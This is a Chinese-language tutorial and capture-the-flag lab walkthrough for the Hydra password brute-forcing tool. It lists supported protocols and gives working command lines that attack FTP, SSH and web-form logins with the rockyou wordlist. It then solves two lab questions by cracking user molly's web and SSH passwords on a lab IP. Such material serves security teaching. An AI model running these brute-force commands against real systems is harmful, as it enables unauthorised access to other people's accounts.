Hydra简介
什么是Hydra(九头蛇)?
Hydra是一个暴力在线密码破解程序,一个针对系统登录密码的快速爆破工具。
我们可以使用Hydra运行一个字典并"暴力破解"一些身份验证服务,想象一下试图在特定服务上手动猜测某人的密码(SSH, Web应用程序登录框, FTP,SNMP),使用 Hydra 运行密码字典以确定正确的密码。
Hydra能够尝试暴力破解以下协议:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle监听器, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP枚举, SNMP v1+v2+v3, SOCKS5, SSH (v1和v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC以及XMPP等。
有关Hydra中每个协议选项的详细信息,请阅读Kali官方的Hydra工具页面:https://en.kali.tools/?p=220
如果你的密码很常见,不包含特殊字符也不超过 8 个字符,则很容易被猜到。存在1 亿个包含常用密码的字典能够被暴力破解工具使用,因此当开箱即用的应用程序使用简单密码登录时,请务必更改默认密码!某些电子摄像头和 web 框架通常会使用 admin:password 作为管理员的默认账户和密码,这显然也不够强大。
安装Hydra
如果你正在使用 Kali Linux,九头蛇是预装的,如果没有--你可以在这里下载:https://github.com/vanhauser-thc/thc-hydra
Hydra简单使用
暴力破解FTP:
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ftp://<url>
暴力破解SSH:
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <url> -t 4 ssh
暴力破解web表单登录:
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <url> http-post-form "<path>:username=^USER^&password=^PASS^:<invalid_response>"
参数
| -l | 用户名 |
| -p | 字典 |
| ftp/ssh | 爆破方式 |
| http-post-form | 表单类型为POST |
| <path> | 登录页面url,例如/longin |
| username=^USER^&password=^PASS^ | username和password为表单字段,将指定的username和passworl替换为^USER^和^PASS^ |
| <invalid_response> | 登录失败时服务器回复中出现的字符串,例如F=incorrect |
| -v | 详细输出 |
| -t | 线程 |
操作
问题一:使用 Hydra 暴力破解molly的web 密码,什么是flag1?
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.16.250 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -v
爆出密码:sunshine
登录url页面得到flag
问题二:使用 Hydra 暴力破解molly的SSH 密码,什么是flag2?
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.16.250 -t 4 ssh
通过ssh登录
ssh molly@10.10.16.250
然后查看文件得flag
网友评论